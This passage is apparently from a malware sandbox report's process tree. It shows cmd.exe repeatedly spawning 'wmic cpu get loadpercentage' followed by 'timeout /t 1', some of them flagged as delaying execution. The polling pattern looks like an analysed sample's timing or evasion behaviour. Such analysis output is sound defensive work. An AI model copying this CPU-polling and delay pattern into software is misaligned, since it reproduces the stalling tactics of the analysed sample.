    PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:96
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4864
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:96
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3984
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1660
